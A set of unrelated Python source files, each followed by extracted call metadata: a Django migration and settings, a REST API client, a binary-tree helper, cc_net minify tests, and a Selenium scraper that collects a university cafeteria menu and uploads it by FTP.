'(0)', 'label': "('$\\\\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var))"}), "([0], [0], lw=0, label='$\\\\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var))\n", (21489, 21561), False, 'from matplotlib.lines import Line2D\n'), ((21591, 21613), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (21597, 21613), False, 'from matplotlib.lines import Line2D\n'), ((21627, 21723), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'linestyle': 'linestyle', 'color': '"""black"""', 'label': "('$%s = %.1e$' % (c_label, c_var))"}), "([0], [0], linestyle=linestyle, color='black', label='$%s = %.1e$' %\n (c_label, c_var))\n", (21633, 21723), False, 'from matplotlib.lines import Line2D\n'), ((21750, 21772), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (21756, 21772), False, 'from matplotlib.lines import Line2D\n'), ((22002, 22024), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)'}), '([0], [0], lw=0)\n', (22008, 22024), False, 'from matplotlib.lines import Line2D\n'), ((10742, 10754), 'active_particles.naming.Cdd', 'naming.Cdd', ([], {}), '()\n', (10752, 10754), True, 'import active_particles.naming as naming\n'), ((10888, 10900), 'active_particles.naming.Cee', 'naming.Cee', ([], {}), '()\n', (10898, 10900), True, 'import active_particles.naming as naming\n'), ((21832, 21927), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'color': 'colors_traj[var_value]', 'label': "('$%s = %.1e$' % (c_label, var_value))"}), "([0], [0], color=colors_traj[var_value], label='$%s = %.1e$' % (\n c_label, var_value))\n", (21838, 21927), False, 'from matplotlib.lines import Line2D\n'), ((22084, 22191), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': '(0)', 'color': '"""black"""', 'marker': 'markers_traj[time_step]', 'label': "('$dt = %.1e$' % time_step)"}), "([0], [0], lw=0, color='black', marker=markers_traj[time_step], label\n ='$dt = %.1e$' % time_step)\n", (22090, 22191), False, 'from matplotlib.lines import Line2D\n')] |
# Generated by Django 2.2.15 on 2021-01-29 22:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sitewebapp', '0013_auto_20210130_0409'),
]
operations = [
migrations.RemoveField(
model_name='auditionrounds',
name='candidate',
),
migrations.AddField(
model_name='auditionrounds',
name='candidate',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates'),
),
]
| [
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] | [((272, 341), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""auditionrounds"""', 'name': '"""candidate"""'}), "(model_name='auditionrounds', name='candidate')\n", (294, 341), False, 'from django.db import migrations, models\n'), ((496, 641), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""candidates"""', 'to': '"""sitewebapp.Candidates"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates')\n", (513, 641), False, 'from django.db import migrations, models\n')] |
import urllib.request
from urllib.parse import urlencode
from json import loads
from socket import timeout
from ssl import _create_unverified_context
from corsair import *
class Api(object):
def __init__(self, base_url, auth, tls_verify=True):
self.base_url = base_url if base_url[-1] != '/' else base_url[:-1]
self.auth = auth
self.tls_verify = tls_verify
self.credentials = (self.base_url, self.auth, self.tls_verify)
self.analytics = Endpoint(self.credentials, 'analytics')
self.ariel = Endpoint(self.credentials, 'ariel')
self.asset_model = Endpoint(self.credentials, 'asset_model')
self.auth = Endpoint(self.credentials, 'auth')
self.config = Endpoint(self.credentials, 'config')
self.data_classification = Endpoint(self.credentials, 'data_classification')
self.forensics = Endpoint(self.credentials, 'forensics')
self.gui_app_framework = Endpoint(self.credentials, 'gui_app_framework')
self.help = Endpoint(self.credentials, 'help')
self.qrm = Endpoint(self.credentials, 'qrm')
self.reference_data = Endpoint(self.credentials, 'reference_data')
self.scanner = Endpoint(self.credentials, 'scanner')
self.services = Endpoint(self.credentials, 'services')
self.siem = Endpoint(self.credentials, 'siem')
self.staged_config = Endpoint(self.credentials, 'staged_config')
self.system = Endpoint(self.credentials, 'system')
class Endpoint(object):
def __init__(self, credentials, endpoint):
self.base_url = credentials[0]
self.endpoint = endpoint
self.resource = ''
self.auth = credentials[1]
self.tls_verify = credentials[2]
def create(self, _resource, **filters):
self.resource = _resource
req = Request(make_url(self.base_url, self.endpoint, self.resource),
self.auth, self.tls_verify)
res = req.post(**filters)
if res.status == 201:
return loads(res.read())
else:
raise CorsairError('Could not create requisition')
def read(self, _resource, **filters):
self.resource = _resource
req = Request(make_url(self.base_url, self.endpoint, self.resource),
self.auth, self.tls_verify)
try:
res = req.get(**filters)
except timeout:
raise CorsairError('Operation timedout')
if res.status == 200:
crange = res.headers['Content-Range'].split(' ')[1] \
if 'Content-Range' in res.headers else None
return {'results': loads(res.read()), 'range': crange}
else:
raise CorsairError('Not found')
class Request(object):
def __init__(self, url, auth, tls_verify):
self.url = url
self.timeout = TIMEOUT
self.context = None if tls_verify else _create_unverified_context()
self.headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Version': '8.0',
'SEC': auth
}
def get(self, **filters):
if 'Range' in filters:
self.headers.update({'Range': filters['Range']})
filters.pop('Range')
url = f'{self.url}?{urlencode(filters)}' if filters else self.url
req = urllib.request.Request(url, headers=self.headers, method='GET')
return urllib.request.urlopen(req, timeout=self.timeout, context=self.context)
def post(self, **filters):
url = f'{self.url}?{urlencode(filters)}' if filters else self.url
req = urllib.request.Request(url, headers=self.headers, method='POST')
return urllib.request.urlopen(req, timeout=self.timeout, context=self.context)
| [
"urllib.parse.urlencode",
"ssl._create_unverified_context"
] | [((2902, 2930), 'ssl._create_unverified_context', '_create_unverified_context', ([], {}), '()\n', (2928, 2930), False, 'from ssl import _create_unverified_context\n'), ((3298, 3316), 'urllib.parse.urlencode', 'urlencode', (['filters'], {}), '(filters)\n', (3307, 3316), False, 'from urllib.parse import urlencode\n'), ((3573, 3591), 'urllib.parse.urlencode', 'urlencode', (['filters'], {}), '(filters)\n', (3582, 3591), False, 'from urllib.parse import urlencode\n')] |
from queue import Queue
def convert_arr_to_binary_tree(arr):
"""
Takes arr representing level-order traversal of Binary Tree
"""
index = 0
length = len(arr)
if length <= 0 or arr[0] == -1:
return None
root = BinaryTreeNode(arr[index])
index += 1
queue = Queue()
queue.put(root)
while not queue.empty():
current_node = queue.get()
left_child = arr[index]
index += 1
if left_child is not None:
left_node = BinaryTreeNode(left_child)
current_node.left = left_node
queue.put(left_node)
right_child = arr[index]
index += 1
if right_child is not None:
right_node = BinaryTreeNode(right_child)
current_node.right = right_node
queue.put(right_node)
return root
def path_from_root_to_node(root, data):
"""
Assuming data as input to find the node
The solution can be easily changed to find a node instead of data
:param data:
:return:
"""
output = path_from_node_to_root(root, data)
return list(reversed(output))
def path_from_node_to_root(root, data):
if root is None:
return None
elif root.data == data:
return [data]
left_answer = path_from_node_to_root(root.left, data)
if left_answer is not None:
left_answer.append(root.data)
return left_answer
right_answer = path_from_node_to_root(root.right, data)
if right_answer is not None:
right_answer.append(root.data)
return right_answer
return None | [
"queue.Queue"
] | [((306, 313), 'queue.Queue', 'Queue', ([], {}), '()\n', (311, 313), False, 'from queue import Queue\n')] |
import os
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('<NAME>', '<EMAIL>'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'data.sqlite'
}
}
ALLOWED_HOSTS = ['*']
TIME_ZONE = 'Europe/Vienna'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'djangodash2013.urls'
WSGI_APPLICATION = 'djangodash2013.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(PROJECT_DIR, 'templates')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'mocks',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
try:
from local_settings import SECRET_KEY
except ImportError:
SECRET_KEY = 'this-is-not-empty'
| [
"os.path.abspath",
"os.path.join"
] | [((1455, 1493), 'os.path.join', 'os.path.join', (['PROJECT_DIR', '"""templates"""'], {}), "(PROJECT_DIR, 'templates')\n", (1467, 1493), False, 'import os\n'), ((41, 66), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (56, 66), False, 'import os\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
sentences = ["Hello world !", "Is everyone happy in here ?"]
hashes = get_hashes(sentences)
assert all([len(h) == HASH_SIZE for h in hashes])
hashes_int = [minify._b2i(h) for h in hashes]
encoded = encode_hashes(hashes)
decoded = decode_hashes(encoded)
assert all([len(d) == HASH_SIZE for d in decoded])
decoded_int = [minify._b2i(d) for d in decoded]
assert hashes_int == decoded_int
assert hashes == decoded
def test_minify():
doc = {
"raw_content": "Hello world !\nIs everyone happy in here ?",
"language": "en",
"perplexity": 120.0,
"line_ids": [0, 4],
}
expected = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
minifier = minify.Minifier()
assert expected == minifier(doc)
@pytest.fixture
def http_from_disk(monkeypatch):
def read_sample_file(url: str, n_retry: int = 3) -> bytes:
expected_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
assert expected_url == url
file = Path(__file__).parent / "data" / "sample.warc.txt"
return file.read_bytes()
monkeypatch.setattr(cc_net.jsonql, "request_get_content", read_sample_file)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
# We don't need no education.
chosen_quotes = "\n".join(
l for l in full_quotes.splitlines() if "Education" not in l
)
cc_doc = {
"url": "http://sample_english.com",
"date_download": "2019-03-18T00:00:00Z",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"source_domain": "sample_english.com",
"title": "Famous Mark Twain Quotes",
"raw_content": full_quotes,
"cc_segment": "crawl-data/sample.warc.wet",
"nlines": 4,
"length": 353,
}
ccnet_metadata = {
"language": "en",
"language_score": 0.99,
"perplexity": 151.5,
"bucket": "head",
"raw_content": chosen_quotes,
"nlines": 3,
"length": len(chosen_quotes),
"original_nlines": 4,
"original_length": 353,
"line_ids": [0, 2, 3],
}
ccnet_doc = dict(cc_doc, **ccnet_metadata)
mini = minify.Minifier()(ccnet_doc.copy())
assert mini is not ccnet_doc
important_fields = [
"url",
"digest",
"cc_segment",
"language",
"language_score",
"perplexity",
"bucket",
"line_ids",
]
expected = {k: ccnet_doc[k] for k in important_fields}
expected["line_ids"] = encode_line_ids(expected["line_ids"]) # type: ignore
assert expected == mini
with jsonql.open_write(tmp_path / "sample.json") as o:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
# line_ids is removed when unminifying
ccnet_doc.pop("line_ids")
assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
mini_docs = [
{
"url": "http://sample_chinese.com",
"digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([2]),
"bucket": "not_that_great",
},
{
"url": "http://sample_english.com",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([3]),
"bucket": "top_notch",
},
]
with jsonql.open_write(tmp_path / "sample.json") as o:
for mini in mini_docs:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
docs = [d for d in fetcher.map(cc) if d is not None]
assert cc.retrieved_segments == 1
# Note: documents are retrieved as they are ordered in the .warc.wet file
assert [
"Facts are stubborn things, but statistics are more pliable.",
"事實是固執的東西,但統計數字卻比較柔和。",
] == [d["raw_content"] for d in docs]
assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
| [
"cc_net.process_wet_file.CCSegmentsReader",
"cc_net.minify._b2i",
"pathlib.Path",
"cc_net.minify.encode_hashes",
"cc_net.minify.get_hashes",
"cc_net.jsonql.open_write",
"json.dumps",
"cc_net.minify.decode_hashes",
"cc_net.minify.Minifier",
"cc_net.minify.encode_line_ids",
"cc_net.minify.Metadata... | [((548, 569), 'cc_net.minify.get_hashes', 'get_hashes', (['sentences'], {}), '(sentences)\n', (558, 569), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((688, 709), 'cc_net.minify.encode_hashes', 'encode_hashes', (['hashes'], {}), '(hashes)\n', (701, 709), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((724, 746), 'cc_net.minify.decode_hashes', 'decode_hashes', (['encoded'], {}), '(encoded)\n', (737, 746), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((1207, 1224), 'cc_net.minify.Minifier', 'minify.Minifier', ([], {}), '()\n', (1222, 1224), True, 'import cc_net.minify as minify\n'), ((3366, 3403), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (["expected['line_ids']"], {}), "(expected['line_ids'])\n", (3381, 3403), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((3562, 3594), 'cc_net.minify.MetadataFetcher', 'minify.MetadataFetcher', (['tmp_path'], {}), '(tmp_path)\n', (3584, 3594), True, 'import cc_net.minify as minify\n'), ((4474, 4506), 'cc_net.minify.MetadataFetcher', 'minify.MetadataFetcher', (['tmp_path'], {}), '(tmp_path)\n', (4496, 4506), True, 'import cc_net.minify as minify\n'), ((4516, 4581), 'cc_net.process_wet_file.CCSegmentsReader', 'process_wet_file.CCSegmentsReader', (["['crawl-data/sample.warc.wet']"], {}), "(['crawl-data/sample.warc.wet'])\n", (4549, 4581), False, 'from cc_net import jsonql, process_wet_file\n'), ((642, 656), 'cc_net.minify._b2i', 'minify._b2i', (['h'], {}), '(h)\n', (653, 656), True, 'import cc_net.minify as minify\n'), ((822, 836), 'cc_net.minify._b2i', 'minify._b2i', (['d'], {}), '(d)\n', (833, 836), True, 'import cc_net.minify as minify\n'), ((3018, 3035), 'cc_net.minify.Minifier', 'minify.Minifier', ([], {}), '()\n', (3033, 3035), True, 'import cc_net.minify as minify\n'), ((3458, 3501), 'cc_net.jsonql.open_write', 'jsonql.open_write', (["(tmp_path / 'sample.json')"], {}), "(tmp_path / 'sample.json')\n", (3475, 3501), False, 'from cc_net import jsonql, process_wet_file\n'), ((4334, 4377), 'cc_net.jsonql.open_write', 'jsonql.open_write', (["(tmp_path / 'sample.json')"], {}), "(tmp_path / 'sample.json')\n", (4351, 4377), False, 'from cc_net import jsonql, process_wet_file\n'), ((3522, 3538), 'json.dumps', 'json.dumps', (['mini'], {}), '(mini)\n', (3532, 3538), False, 'import json\n'), ((3977, 3997), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (['[2]'], {}), '([2])\n', (3992, 3997), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((4251, 4271), 'cc_net.minify.encode_line_ids', 'encode_line_ids', (['[3]'], {}), '([3])\n', (4266, 4271), False, 'from cc_net.minify import HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes\n'), ((4433, 4449), 'json.dumps', 'json.dumps', (['mini'], {}), '(mini)\n', (4443, 4449), False, 'import json\n'), ((1511, 1525), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1515, 1525), False, 'from pathlib import Path\n')] |
##bu python kodu, selenium ve chromedriver ile çalışmakta, siteyi normal kullanıcı gibi ziyaret edip, gerekli verileri parse ediyor
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
from bs4 import BeautifulSoup
import time, datetime
import json
import requests
import sys
import ftplib
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--window-size=1920x1080")
chrome_driver = os.getcwd() +"\\chromedriver.exe"
browser = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver) #replace with .Firefox(), or with the browser of your choice
url = "http://sks.istanbulc.edu.tr/tr/yemeklistesi"
browser.get(url) #navigate to the page
time.sleep(10)
kah_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[1]')
ogle_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[2]')
#aksam_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[3]')
vegan_buton = browser.find_element_by_xpath('//*[@id="4E00590053005F006D004C00500035005500720059003100"]/div/div/div[2]/ul/li[6]')
kumanya_buton = browser.find_element_by_xpath('//*[@id="<KEY>"]/div/div/div[2]/ul/li[4]')
son = {}
son["yemek_liste"] = []
def kah_json_olustur():
time.sleep(5)
kah = browser.find_element_by_id("tab-kahvalti")
bs = BeautifulSoup(kah.get_attribute('innerHTML'), "lxml")
bs2 = bs.find_all('table')
js = []
for h in bs2:
b = h.find_all('tr')
try:
yemek1 = b[1].text.split('\n')[2]
except:
yemek1="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek2 = b[1].text.split('\n')[3]
except:
yemek2="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek3 = b[1].text.split('\n')[4]
except:
yemek3="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek4 = b[1].text.split('\n')[5]
except:
yemek4="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
calori = b[2].text.replace("\n", "")
except:
calori="---"
print("Oops!", sys.exc_info()[0], "occured.")
if yemek1 == "":
yemek1 = "---"
if yemek2 == "":
yemek2 = "---"
if yemek3 == "":
yemek3 = "---"
if yemek4 == "":
yemek4 = "---"
dt = datetime.datetime.strptime(b[0].text.replace("\n", ""), '%d.%m.%Y')
dt = dt.strftime('%Y-%m-%d %H:%M:%S')
ta = {"tarih": dt,"ogun":"Kahvaltı","yemek1":yemek1,"yemek2":yemek2,"yemek3":yemek3,"yemek4":yemek4,"calori":calori }
son["yemek_liste"].append(ta)
def ogle_json_olustur():
time.sleep(5)
kah = browser.find_element_by_id("tab-ogle")
bs = BeautifulSoup(kah.get_attribute('innerHTML'), "lxml")
bs2 = bs.find_all('table')
js = []
for h in bs2:
b = h.find_all('tr')
try:
yemek1 = b[1].text.split('\n')[1]
except:
yemek1="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek2 = b[1].text.split('\n')[2]
except:
yemek2="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek3 = b[1].text.split('\n')[3]
except:
yemek3="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek4 = b[1].text.split('\n')[4]
except:
yemek4="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
calori = b[2].text.replace("\n", "")
except:
calori="---"
print("Oops!", sys.exc_info()[0], "occured.")
dt = datetime.datetime.strptime(b[0].text.replace("\n", ""), '%d.%m.%Y')
dt = dt.strftime('%Y-%m-%d %H:%M:%S')
if yemek1 == "":
yemek1 = "---"
if yemek2 == "":
yemek2 = "---"
if yemek3 == "":
yemek3 = "---"
if yemek4 == "":
yemek4 = "---"
ta = {"tarih": dt,"ogun":"Öğle Yemeği","yemek1":yemek1,"yemek2":yemek2,"yemek3":yemek3,"yemek4":yemek4,"calori":calori}
son["yemek_liste"].append(ta)
def aksam_json_olustur():
time.sleep(5)
kah = browser.find_element_by_id("tab-ogle")
bs = BeautifulSoup(kah.get_attribute('innerHTML'), "lxml")
bs2 = bs.find_all('table')
js = []
for h in bs2:
b = h.find_all('tr')
try:
yemek1 = b[1].text.split('\n')[1]
except:
yemek1="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek2 = b[1].text.split('\n')[2]
except:
yemek2="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek3 = b[1].text.split('\n')[3]
except:
yemek3="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek4 = b[1].text.split('\n')[4]
except:
yemek4="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
calori = b[2].text.replace("\n", "")
except:
calori="---"
print("Oops!", sys.exc_info()[0], "occured.")
if yemek1 == "":
yemek1 = "---"
if yemek2 == "":
yemek2 = "---"
if yemek3 == "":
yemek3 = "---"
if yemek4 == "":
yemek4 = "---"
dt = datetime.datetime.strptime(b[0].text.replace("\n", ""), '%d.%m.%Y')
dt = dt.strftime('%Y-%m-%d %H:%M:%S')
ta = {"tarih": dt,"ogun":"<NAME>","yemek1":yemek1,"yemek2":yemek2,"yemek3":yemek3,"yemek4":yemek4,"calori": calori}
son["yemek_liste"].append(ta)
def vegan_json_olustur():
time.sleep(5)
kah = browser.find_element_by_id("tab-vegan")
bs = BeautifulSoup(kah.get_attribute('innerHTML'), "lxml")
bs2 = bs.find_all('table')
for h in bs2:
b = h.find_all('tr')
try:
yemek1 = b[1].text.split('\n')[1]
except:
yemek1="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek2 = b[1].text.split('\n')[2]
except:
yemek2="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek3 = b[1].text.split('\n')[3]
except:
yemek3="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek4 = b[1].text.split('\n')[4]
except:
yemek4="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
calori = b[2].text.replace("\n", "")
except:
calori="---"
print("Oops!", sys.exc_info()[0], "occured.")
if yemek1 == "":
yemek1 = "---"
if yemek2 == "":
yemek2 = "---"
if yemek3 == "":
yemek3 = "---"
if yemek4 == "":
yemek4 = "---"
dt = datetime.datetime.strptime(b[0].text.replace("\n", ""), '%d.%m.%Y')
dt = dt.strftime('%Y-%m-%d %H:%M:%S')
ta = {"tarih": dt,"ogun":"Vegan","yemek1":yemek1,"yemek2":yemek2,"yemek3":yemek3,"yemek4":yemek4,"calori": calori}
son["yemek_liste"].append(ta)
def kumanya_json_olustur():
time.sleep(5)
kah = browser.find_element_by_id("tab-kumanya")
bs = BeautifulSoup(kah.get_attribute('innerHTML'), "lxml")
bs2 = bs.find_all('table')
for h in bs2:
b = h.find_all('tr')
try:
yemek1 = b[1].text.split('\n')[1]
except:
yemek1="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek2 = b[1].text.split('\n')[2]
except:
yemek2="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek3 = b[1].text.split('\n')[3]
except:
yemek3="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
yemek4 = b[1].text.split('\n')[4]
except:
yemek4="---"
print("Oops!", sys.exc_info()[0], "occured.")
try:
calori = b[2].text.replace("\n", "")
except:
calori="---"
print("Oops!", sys.exc_info()[0], "occured.")
if yemek1 == "":
yemek1 = "---"
if yemek2 == "":
yemek2 = "---"
if yemek3 == "":
yemek3 = "---"
if yemek4 == "":
yemek4 = "---"
dt = datetime.datetime.strptime(b[0].text.replace("\n", ""), '%d.%m.%Y')
dt = dt.strftime('%Y-%m-%d %H:%M:%S')
ta = {"tarih": dt,"ogun":"Öğle Yemeği","yemek1":yemek1,"yemek2":yemek2,"yemek3":yemek3,"yemek4":yemek4,"calori": calori}
son["yemek_liste"].append(ta)
def dosya_olsutur():
with open('yemek.json', 'w') as outfile:
json.dump(son, outfile)
def mysql_isleri():
requests.get("*****")
def ftp_yukle():
print("----------------")
print(" ")
print("ftp deneniyor...")
import ftplib
ftp = ftplib.FTP()
host = "****"
port = 21
ftp.connect(host, port)
print(ftp.getwelcome())
File2Send = "yemek.json"
Output_Directory = "//****//"
try:
print("Giriş Yapılıyor...")
ftp.login("****", "****")
time.sleep(6)
mysql_isleri()
print("Başarılı")
except Exception as e:
print(e)
try:
file = open('yemek.json', 'rb') # file to send
ftp.storbinary('STOR yemek.json', file) # send the file
except Exception as e:
print(e)
ftp.quit()
print(" ")
print("----------------")
def sonuc():
dosya_olsutur()
ftp_yukle()
try:
kah_buton.click()
kah_json_olustur()
except:
print("Kahvaltı oluşturalamadı", sys.exc_info()[0])
try:
ogle_buton.click()
ogle_json_olustur()
except:
print("Öğle oluşturalamadı", sys.exc_info()[0])
try:
ogle_buton.click()
aksam_json_olustur()
except:
print("Akşam oluşturalamadı", sys.exc_info()[0])
try:
vegan_buton.click()
vegan_json_olustur()
except:
print("Vegan oluşturalamadı", sys.exc_info()[0])
try:
kumanya_buton.click()
kumanya_json_olustur()
except:
print("Kumanya oluşturalamadı", sys.exc_info()[0])
browser.close()
print(json.dumps(son))
print("-------------")
sonuc()
time.sleep(5)
mysql_isleri()
print("-----Güncelleme Bitti----")
| [
"selenium.webdriver.chrome.options.Options",
"ftplib.FTP",
"selenium.webdriver.Chrome",
"json.dumps",
"requests.get",
"time.sleep",
"os.getcwd",
"sys.exc_info",
"json.dump"
] | [((351, 360), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (358, 360), False, 'from selenium.webdriver.chrome.options import Options\n'), ((521, 599), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options', 'executable_path': 'chrome_driver'}), '(chrome_options=chrome_options, executable_path=chrome_driver)\n', (537, 599), False, 'from selenium import webdriver\n'), ((752, 766), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (762, 766), False, 'import time, datetime\n'), ((10543, 10556), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (10553, 10556), False, 'import time, datetime\n'), ((477, 488), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (486, 488), False, 'import os\n'), ((1313, 1326), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1323, 1326), False, 'import time, datetime\n'), ((2857, 2870), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2867, 2870), False, 'import time, datetime\n'), ((4400, 4413), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (4410, 4413), False, 'import time, datetime\n'), ((5938, 5951), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5948, 5951), False, 'import time, datetime\n'), ((7466, 7479), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (7476, 7479), False, 'import time, datetime\n'), ((9096, 9117), 'requests.get', 'requests.get', (['"""*****"""'], {}), "('*****')\n", (9108, 9117), False, 'import requests\n'), ((9240, 9252), 'ftplib.FTP', 'ftplib.FTP', ([], {}), '()\n', (9250, 9252), False, 'import ftplib\n'), ((10494, 10509), 'json.dumps', 'json.dumps', (['son'], {}), '(son)\n', (10504, 10509), False, 'import json\n'), ((9044, 9067), 'json.dump', 'json.dump', (['son', 'outfile'], {}), '(son, outfile)\n', (9053, 9067), False, 'import json\n'), ((9492, 9505), 'time.sleep', 'time.sleep', (['(6)'], {}), '(6)\n', (9502, 9505), False, 'import time, datetime\n'), ((9983, 9997), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9995, 9997), False, 'import sys\n'), ((10097, 10111), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10109, 10111), False, 'import sys\n'), ((10211, 10225), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10223, 10225), False, 'import sys\n'), ((10327, 10341), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10339, 10341), False, 'import 